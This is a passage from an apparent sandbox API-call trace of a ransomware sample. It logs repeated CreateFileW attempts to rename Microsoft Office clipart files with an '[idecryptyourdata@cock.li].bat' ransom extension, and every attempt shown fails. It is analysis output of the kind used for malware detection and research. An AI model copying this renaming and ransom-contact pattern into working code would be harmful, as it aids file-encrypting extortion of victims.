(hObject=0x3ac) returned 1 [0173.607] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.607] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.607] CloseHandle (hObject=0x3ac) returned 1 [0173.608] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.608] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.608] CloseHandle (hObject=0x3ac) returned 1 [0173.609] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.609] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.610] CloseHandle (hObject=0x3ac) returned 1 [0173.611] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.611] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.611] CloseHandle (hObject=0x3ac) returned 1 [0173.613] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.613] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.614] CloseHandle (hObject=0x3ac) returned 1 [0173.614] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.614] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.615] CloseHandle (hObject=0x3ac) returned 1 [0173.616] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.616] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.617] CloseHandle (hObject=0x3ac) returned 1 [0173.659] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.659] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.660] CloseHandle (hObject=0x3ac) returned 1 [0173.661] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.661] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.661] CloseHandle (hObject=0x3ac) returned 1 [0173.662] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.662] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.662] CloseHandle (hObject=0x3ac) returned 1 [0173.662] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.663] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.663] CloseHandle (hObject=0x3ac) returned 1 [0173.663] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.663] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.664] CloseHandle (hObject=0x3ac) returned 1 [0173.665] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.665] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.132] CloseHandle (hObject=0x3ac) returned 1 [0174.133] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.134] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.134] CloseHandle (hObject=0x3ac) returned 1 [0174.135] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.135] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.135] CloseHandle (hObject=0x3ac) returned 1 [0174.136] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.136] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.137] CloseHandle (hObject=0x3ac) returned 1 [0174.138] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.138] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.138] CloseHandle (hObject=0x3ac) returned 1 [0174.139] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.139] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.140] CloseHandle (hObject=0x3ac) returned 1 [0174.140] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.140] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.141] CloseHandle (hObject=0x3ac) returned 1 [0174.142] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.142] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.142] CloseHandle (hObject=0x3ac) returned 1 [0174.143] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.144] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.144] CloseHandle (hObject=0x3ac) returned 1 [0174.145] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.145] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.146] CloseHandle (hObject=0x3ac) returned 1 [0174.146] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.147] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.147] CloseHandle (hObject=0x3ac) returned 1 [0174.170] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.171] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.171] CloseHandle (hObject=0x3ac) returned 1 [0174.172] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.172] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.173] CloseHandle (hObject=0x3ac) returned 1 [0174.174] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.174] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.174] CloseHandle (hObject=0x3ac) returned 1 [0174.176] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.176] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.176] CloseHandle (hObject=0x3ac) returned 1 [0174.178] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.178] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.179] CloseHandle (hObject=0x3ac) returned 1 [0174.180] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.181] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.181] CloseHandle (hObject=0x3ac) returned 1 [0174.183] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.183] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.184] CloseHandle (hObject=0x3ac) returned 1 [0174.186] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.186] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.186] CloseHandle (hObject=0x3ac) returned 1 [0174.187] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.187] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02045_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 